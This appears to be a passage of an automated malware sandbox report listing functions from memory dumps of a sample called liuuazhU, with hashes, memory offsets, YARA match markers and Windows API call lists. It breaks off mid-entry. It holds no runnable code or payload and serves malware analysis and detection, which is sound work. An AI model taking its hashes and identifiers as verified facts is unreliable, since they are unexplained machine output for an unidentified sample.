                                                                                        • Opcode Fuzzy Hash: 396ff4d00c58848ac350f646174db21a0a8d72b8d1ac01ce4a2de2e6234c3fa5
                                                                                        • Instruction Fuzzy Hash: E1F18D74E01228CFDB64DFA5C994BDDBBB2AF58300F1081AAE509A7354DB355E85CF50
                                                                                        Function 20D16560 Relevance: .3, Instructions: 319COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bcad923e8a0920b9f36d45ea2ebc9b19141ab166e8badc5b2aa244a155343d2a
                                                                                        • Instruction ID: 5f4668ffdd08059f068824dab78be3e4223cb7bf1fe63e71a31e0daa7e13d8cb
                                                                                        • Opcode Fuzzy Hash: bcad923e8a0920b9f36d45ea2ebc9b19141ab166e8badc5b2aa244a155343d2a
                                                                                        • Instruction Fuzzy Hash: EFF18E74E01228CFDB64DFA5C994BADBBB2AF98300F1081AAE509A7354DB355E85CF50
                                                                                        Function 20D1B168 Relevance: .3, Instructions: 319COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cdba854d38871aba85f5321adbf5c45e53a1c646f3d88b0125233447d404305b
                                                                                        • Instruction ID: 71548e57c76c906b11feafe49d8e87dcf51c2d63f23c3a5e99b6689f9609fee5
                                                                                        • Opcode Fuzzy Hash: cdba854d38871aba85f5321adbf5c45e53a1c646f3d88b0125233447d404305b
                                                                                        • Instruction Fuzzy Hash: C8F19E74E01228CFDB64DFA9C994BADBBB2BF58300F1081AAE509A7354DB355E85CF50
                                                                                        Function 20D176A0 Relevance: .3, Instructions: 319COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b36206a9e90772a8dd7cbe757e4f27e8378349a2d1a1098c714024171a1c4dee
                                                                                        • Instruction ID: 8eb27149d085ac1740ed0b8bf7c0ab26e1dc6acb21e1843a91c53e5df7c1269e
                                                                                        • Opcode Fuzzy Hash: b36206a9e90772a8dd7cbe757e4f27e8378349a2d1a1098c714024171a1c4dee
                                                                                        • Instruction Fuzzy Hash: 42F18E74E01228CFDB64DFA5C994BEDBBB2AF58300F1081AAE509A7354DB355E85CF50
                                                                                        Function 20D1C2A8 Relevance: .3, Instructions: 319COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3a3f7d26a14b9891da8d6946362106835a3a23f42495bb4e1ba3a460400fe5be
                                                                                        • Instruction ID: d213b4f2e00ba7d10075642c7840dd152319bf80c64e316058a99a4b81103e77
                                                                                        • Opcode Fuzzy Hash: 3a3f7d26a14b9891da8d6946362106835a3a23f42495bb4e1ba3a460400fe5be
                                                                                        • Instruction Fuzzy Hash: 7BF19E74E01228CFDB64CFA5C994BADBBB2BF98300F1085AAE509A7354DB355E85CF50
                                                                                        Function 20D14E60 Relevance: .3, Instructions: 319COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ef91fe40db60c130720b9d6e182837249e9b0a97bf736c162900464ef19ef3a9
                                                                                        • Instruction ID: 6ea744d5335702fbf87c05e374cc2476874e19b0b5fc774425e7f780a14d64d8
                                                                                        • Opcode Fuzzy Hash: ef91fe40db60c130720b9d6e182837249e9b0a97bf736c162900464ef19ef3a9
                                                                                        • Instruction Fuzzy Hash: 93F18D74E01228CFDB64DFA5C994B9DBBB2AF98300F1081AAE509A7354DB355E85CF50
                                                                                        Function 20D19A68 Relevance: .3, Instructions: 319COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 958c1e5cf4775323f048513dd590f8d9614f308a5fe91a0677883e8268e66e14
                                                                                        • Instruction ID: 29819cae91122c9242949b1cf8d1507c7506477500792e83a8b0a398ab345c23
                                                                                        • Opcode Fuzzy Hash: 958c1e5cf4775323f048513dd590f8d9614f308a5fe91a0677883e8268e66e14
                                                                                        • Instruction Fuzzy Hash: FDF19D74E01228CFDB64CFA5C994BEDBBB2AF98300F1481AAE509A7354DB355E85CF50
                                                                                        Function 20D18220 Relevance: .3, Instructions: 319COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 620aeafd8ec9062050496a81634079a978ba6635b977a8eaab773a5aa693d049
                                                                                        • Instruction ID: 171b138642d56c2279c20deb342ac2ceb2b632175f1a6a1904e5c28750ca1f3b
                                                                                        • Opcode Fuzzy Hash: 620aeafd8ec9062050496a81634079a978ba6635b977a8eaab773a5aa693d049
                                                                                        • Instruction Fuzzy Hash: 29F19D74E01228CFDB64CFA5C994BEDBBB2AF98300F1481AAE509A7354DB355E85CF50
                                                                                        Function 20D1CE28 Relevance: .3, Instructions: 319COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c92665c9ef1e055b7b757b927d1fd03d46b41e05a504ffaa14530a7035cefc0c
                                                                                        • Instruction ID: d0a3660c7442550c209c8fc48a98829af9a7cdf7422c33f2f5c86c1155d89b58
                                                                                        • Opcode Fuzzy Hash: c92665c9ef1e055b7b757b927d1fd03d46b41e05a504ffaa14530a7035cefc0c
                                                                                        • Instruction Fuzzy Hash: E0F18D74E01228CFDB64DFA5C994BADBBB2BF98300F1081AAE509A7354DB355E85CF50
                                                                                        Function 20D187E0 Relevance: .3, Instructions: 319COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7a175d3294aee086d225e62f636917530027e4d9ce90a51fb8c621ba7c95de8a
                                                                                        • Instruction ID: 50a55e1499e989230c9fd6df53b84410a166fa4f792a422e9706679eb6678644
                                                                                        • Opcode Fuzzy Hash: 7a175d3294aee086d225e62f636917530027e4d9ce90a51fb8c621ba7c95de8a
                                                                                        • Instruction Fuzzy Hash: 62F18D74E01228CFDB64DFA5C994BEDBBB2AF98300F1081AAE509A7354DB355E85CF50
                                                                                        Function 20D1ABA8 Relevance: .3, Instructions: 319COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a65f6b1c42f9ee44ae942ea68531f3d7eb089dd6fba67be9407122530f0112fc
                                                                                        • Instruction ID: 1468812e51eb59890c3e516ec26447b4e3c0d652c4c002267877d8e4328b9284
                                                                                        • Opcode Fuzzy Hash: a65f6b1c42f9ee44ae942ea68531f3d7eb089dd6fba67be9407122530f0112fc
                                                                                        • Instruction Fuzzy Hash: E4F18E74E01228CFDB64DFA9C994BADBBB2BF58300F1081AAE509A7354DB355E85CF50
                                                                                        Function 20D16B20 Relevance: .3, Instructions: 319COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b72d5a18e0a6e19e612a99c418f48330d7fd5d476d70be516dce21f9d6c45122
                                                                                        • Instruction ID: 08c9ece7165498cc4553017113a21333d25c4f59071f7fff3e18f9378051955f
                                                                                        • Opcode Fuzzy Hash: b72d5a18e0a6e19e612a99c418f48330d7fd5d476d70be516dce21f9d6c45122
                                                                                        • Instruction Fuzzy Hash: CDF18D74E01228CFDB64DFA5C994BADBBB2BF98300F1081AAE509A7354DB355E85CF50
                                                                                        Function 20D1B728 Relevance: .3, Instructions: 319COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: afe23289d0f8aaf6402c0489d7120fa53950ccc8fab5b191ac0fe58cd90bc6c1
                                                                                        • Instruction ID: 921c963dd34926380bb66bab4664ffdc77dd7215d73efb597145ad8ce013c573
                                                                                        • Opcode Fuzzy Hash: afe23289d0f8aaf6402c0489d7120fa53950ccc8fab5b191ac0fe58cd90bc6c1
                                                                                        • Instruction Fuzzy Hash: A8F19E74E01228CFDB64DFA9C994B9DBBB2AF58300F1081AAD509A7354DB355E85CF50
                                                                                        Function 20D1DE60 Relevance: .2, Instructions: 207COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1256b8a973482e291f3dfd45ad78e0a0912f147190a40fd41fb737e11184bee3
                                                                                        • Instruction ID: 3c4ce591e4f233f306af34f560d51c0e5418d1330dffb9937222b0e953e7988a
                                                                                        • Opcode Fuzzy Hash: 1256b8a973482e291f3dfd45ad78e0a0912f147190a40fd41fb737e11184bee3
                                                                                        • Instruction Fuzzy Hash: DBB18B74A012288FCB65DF64C998BDABBB2BF49301F1085E9E449A7360DB359EC1CF44
                                                                                        Function 20D1E060 Relevance: .1, Instructions: 124COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3112893052.0000000020D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 20D10000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20d10000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b6baed59d110556ce64f2045dc48b228f5486d43d9aa9dc34daf728da51f0feb
                                                                                        • Instruction ID: b4820a1bba90b7cfbf49ad898dec5ffb62d7fc47447fdf508c93821ddd125914
                                                                                        • Opcode Fuzzy Hash: b6baed59d110556ce64f2045dc48b228f5486d43d9aa9dc34daf728da51f0feb
                                                                                        • Instruction Fuzzy Hash: F051B174901228CFCB69DF64D898AD9B7B2BF5A301F2085E9D409A7360DB359E81CF94
                                                                                        Function 1CFCDD90 Relevance: .1, Instructions: 114COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3108680787.000000001CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1CFC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_1cfc0000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c7f4b23370da50f8861c0caad5e5516bfdc1176c48583d80d20aab3bb536edd1
                                                                                        • Instruction ID: 0c7a74bb8901ca37a1adff6c482c16eedb63dd9e7a5a195418a3a63f0bff5bce
                                                                                        • Opcode Fuzzy Hash: c7f4b23370da50f8861c0caad5e5516bfdc1176c48583d80d20aab3bb536edd1
                                                                                        • Instruction Fuzzy Hash: F241D1B4E00249DFDB14DFA9D884ADEFBF1BB59300F209129E419BB290D7749885CF59
                                                                                        Function 211703F8 Relevance: .1, Instructions: 89COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3113302494.0000000021170000.00000040.00000800.00020000.00000000.sdmp, Offset: 21170000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_21170000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0ec3a4c9982d4441dac002a0139391265f7f4443489c03b2d92c8c62a2820f74
                                                                                        • Instruction ID: 2d71c29eff7fc75eed538ea6e5236199aa94a596feaedb1a91c79887ac366cb3
                                                                                        • Opcode Fuzzy Hash: 0ec3a4c9982d4441dac002a0139391265f7f4443489c03b2d92c8c62a2820f74
                                                                                        • Instruction Fuzzy Hash: 2731AAB4D01208DFCB14CFA9D984ADEFBF5AB4A310F20902AE408BB310D374AA46CF54
                                                                                        Function 21170400 Relevance: .1, Instructions: 85COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3113302494.0000000021170000.00000040.00000800.00020000.00000000.sdmp, Offset: 21170000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_21170000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 45211507bc447a9af156d6594c8c8a5ba78de2ccf69066b15c7a8b8d208436e6
                                                                                        • Instruction ID: 565db903422c89b0ba1ba71b3918839edcec42f29feab41c6b416ad9ce9c7bf0
                                                                                        • Opcode Fuzzy Hash: 45211507bc447a9af156d6594c8c8a5ba78de2ccf69066b15c7a8b8d208436e6
                                                                                        • Instruction Fuzzy Hash: A03189B5D01218DFCB14CFA9D984ADEFBF5AB4A310F20902AE919B7310D374AA46CF54
                                                                                        Function 211703C8 Relevance: .1, Instructions: 82COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3113302494.0000000021170000.00000040.00000800.00020000.00000000.sdmp, Offset: 21170000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_21170000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 067878ae74f588b9f2f8ae6deb55c96942bdfcf014d0e94841a7afe9ff7b1d22
                                                                                        • Instruction ID: cf90fd23cb1f5d6d73617ab51d365a1caadfccf3d815e050f03030bbbc0e9713
                                                                                        • Opcode Fuzzy Hash: 067878ae74f588b9f2f8ae6deb55c96942bdfcf014d0e94841a7afe9ff7b1d22
                                                                                        • Instruction Fuzzy Hash: 8331DBB5D052089FCB05CFA8D880ADDFBF1AF5A310F14906AE548BB260D3359A86CF55
                                                                                        Function 2018BF2A Relevance: .1, Instructions: 64COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3111887989.0000000020180000.00000040.00000800.00020000.00000000.sdmp, Offset: 20180000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20180000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8d31da7764114ee0472a1f5b538b864ba44c71727952803e0fa8368a91670186
                                                                                        • Instruction ID: ab33a86cc7ba0013ff10dbc39be1a739c27c73462a11dff2221c0e36d99041dc
                                                                                        • Opcode Fuzzy Hash: 8d31da7764114ee0472a1f5b538b864ba44c71727952803e0fa8368a91670186
                                                                                        • Instruction Fuzzy Hash: BD21BCB5D052188FDB10CF99D580ADEFBF0EB49320F24905AE918B7311C374AA41CFA5
                                                                                        Function 2018BF30 Relevance: .1, Instructions: 63COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3111887989.0000000020180000.00000040.00000800.00020000.00000000.sdmp, Offset: 20180000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_20180000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ab7a05de19e66010c0c45d4af3f4504b5c21b260298242e9e7103c9733d828a2
                                                                                        • Instruction ID: 03ad40059b5dc92d2c4ff10a345f8ff835c02db40c3a629408a20dda221f96c6
                                                                                        • Opcode Fuzzy Hash: ab7a05de19e66010c0c45d4af3f4504b5c21b260298242e9e7103c9733d828a2
                                                                                        • Instruction Fuzzy Hash: 71219AB5D052189FDB10CF99D980ADEFBF4EB49320F24905AE918B7310C375AA41CFA5
                                                                                        Function 2101240B Relevance: .0, Instructions: 37COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3113101885.0000000021010000.00000040.00000800.00020000.00000000.sdmp, Offset: 21010000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_21010000_liuuazhU.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9d9d6311e1656615ac50f67cc50002ed963ab7f1617831326c5c7151d5e0e7ef
                                                                                        • Instruction ID: b4ec0e9dae43ccc00d256dfd5fdc1da7172acce9582709edd153246a0090976e
                                                                                        • Opcode Fuzzy Hash: 9d9d6311e1656615ac50f67cc50002ed963ab7f1617831326c5c7151d5e0e7ef
                                                                                        • Instruction Fuzzy Hash: D7F03170951229EFD704EFB4D19C3AEBFB4EB4B346F1058B8D40993240C7384644CB41
                                                                                        Function 00417081 Relevance: 31.8, APIs: 21, Instructions: 340COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                                        • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,1CFD18C0), ref: 004170C5
                                                                                        • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                                        • _malloc.LIBCMT ref: 0041718A
                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                                        • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                                        • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                        • _malloc.LIBCMT ref: 0041724C
                                                                                        • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                        • __freea.LIBCMT ref: 004172A4
                                                                                        • __freea.LIBCMT ref: 004172AD
                                                                                        • ___ansicp.LIBCMT ref: 004172DE
                                                                                        • ___convertcp.LIBCMT ref: 00417309
                                                                                        • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                        • _malloc.LIBCMT ref: 00417362
                                                                                        • _memset.LIBCMT ref: 00417384
                                                                                        • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                                        • ___convertcp.LIBCMT ref: 004173BA
                                                                                        • __freea.LIBCMT ref: 004173CF
                                                                                        • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3089721536.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                        • String ID:
                                                                                        • API String ID: 3809854901-0
                                                                                        • Opcode ID: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                        • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                        • Opcode Fuzzy Hash: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                        • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                                        Function 004057B0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _malloc.LIBCMT ref: 004057DE
                                                                                          • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                          • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                          • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                        • _malloc.LIBCMT ref: 00405842
                                                                                        • _malloc.LIBCMT ref: 00405906
                                                                                        • _malloc.LIBCMT ref: 00405930
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3089721536.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _malloc$AllocateHeap
                                                                                        • String ID: 1.2.3
                                                                                        • API String ID: 680241177-2310465506
                                                                                        • Opcode ID: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                        • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                                        • Opcode Fuzzy Hash: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                        • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                                        Function 0040BCC2 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3089721536.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                        • String ID:
                                                                                        • API String ID: 3886058894-0
                                                                                        • Opcode ID: bd76f0579c09bb0a6f952e3feb4c94488d7cfab1bd6474dd60967b9cc6db7677
                                                                                        • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                        • Opcode Fuzzy Hash: bd76f0579c09bb0a6f952e3feb4c94488d7cfab1bd6474dd60967b9cc6db7677
                                                                                        • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                        Function 004017E0 Relevance: 10.6, APIs: 7, Instructions: 50COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • EntryPoint.LIUUAZHU(80070057), ref: 004017EE
                                                                                          • Part of subcall function 00401030: RaiseException.KERNEL32(-0000000113D97C15,00000001,00000000,00000000,00000015,2C2D8410), ref: 0040101C
                                                                                          • Part of subcall function 00401030: GetLastError.KERNEL32 ref: 00401030
                                                                                        • EntryPoint.LIUUAZHU(80070057), ref: 00401800
                                                                                        • EntryPoint.LIUUAZHU(80070057), ref: 00401813
                                                                                        • __recalloc.LIBCMT ref: 00401828
                                                                                        • EntryPoint.LIUUAZHU(8007000E), ref: 00401839
                                                                                        • EntryPoint.LIUUAZHU(8007000E), ref: 00401853
                                                                                        • _calloc.LIBCMT ref: 00401861
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3089721536.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3089721536.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_400000_liuuazhU.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: EntryPoint$ErrorExceptionLastRaise__recalloc_calloc
                                                                                        • String ID:
                                                                                        • API String ID: 1721462702-0
                                                                                        • Opcode ID: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
                                                                                        • Instruction ID: 9b44c07ae4757e317c030d83b628f3e382e80143504443e1f3b2735d650bea0f
